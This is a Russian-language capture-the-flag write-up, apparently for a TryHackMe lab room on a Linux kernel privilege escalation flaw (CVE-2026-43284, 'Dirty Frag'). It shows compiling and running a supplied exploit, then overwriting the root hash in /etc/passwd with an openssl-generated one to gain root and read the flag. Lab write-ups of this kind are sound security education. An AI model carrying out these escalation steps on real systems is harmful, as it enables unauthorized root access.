## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-REVYHUB-CVE-2026-43284---DIRTYFRAG-ANALYSIS-THM-
# TryHackMe — CVE-2026-43284: Dirty Frag
**Комната:** CVE-2026-43284: Dirty Frag **Категория:** Повышение привилегий в Linux **Автор:** _(Моя страница)_
## Обзор
Dirty Frag — это комната по локальному повышению привилегий (LPE) в Linux, построенная вокруг CVE-2026-43284. Цель — перейти от непривилегированной оболочки к root, используя предоставленный proof-of-concept эксплойт.
## Первоначальная энумерация
Вывод содержимого рабочего каталога показывает файлы, предоставленные для эксплойта:
root@kitploit:~
$ ls
README.txt
exp
exp.c
* `exp.c` — исходный код эксплойта
* `exp` — предварительно скомпилированный бинарный файл (может не соответствовать окружению целевой системы)
* `README.txt` — примечания по использованию, прилагаемые к эксплойту
## Сборка эксплойта
Поскольку предоставленный бинарник `exp` может быть несовместим с точным окружением цели, безопаснее пересобрать его из исходников:
root@kitploit:~
$ gcc -O0 -Wall -o exp exp.c -lutil
* `-O0` отключает оптимизации компилятора, сохраняя предсказуемое поведение и соответствие исходному коду
* `-Wall` включает предупреждения компилятора, полезные для проверки корректности сборки
* `-lutil` линкует `libutil` — обычно требуется, когда код использует функции псевдотерминала (pty)
## Активация уязвимости
root@kitploit:~
$ ./exp
Запуск скомпилированного эксплойта активирует лежащую в основе уязвимость, что даёт доступ на запись к файлу, который обычно доступен непривилегированным пользователям только для чтения — в данном случае `/etc/passwd`.
## Повышение до root
Получив доступ на запись, генерируем новый хэш пароля для `root`:
root@kitploit:~
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..
Этот хэш записывается в `/etc/passwd` вместо существующего поля хэша root:
root@kitploit:~
$ nano /etc/passwd
Теперь, когда пароль root известен, смена пользователя проста:
root@kitploit:~
$ su root
## Захват флага
root@kitploit:~
$ cat /root/flag.txt
THM{REDACTED}
## Извлечённые уроки
* _(Изначально на общее понимание ушло 30+ минут, но как только я понял суть, я смог повторно запускать один и тот же эксплойт несколько раз)_
* _(Внутренний root-код странный: нельзя выбрать и использовать базовые элементы управления, поэтому вместо этого нужно стрелками перейти к root❌ и заменить X на созданный вами хэш)_
## Меры предотвращения
* Держите ядро и системные пакеты пропатченными и обновлёнными
* * *
_Этот райтап описывает пройденную комнату TryHackMe в образовательных целях. Целевое окружение — намеренно уязвимая машина, предоставленная TryHackMe._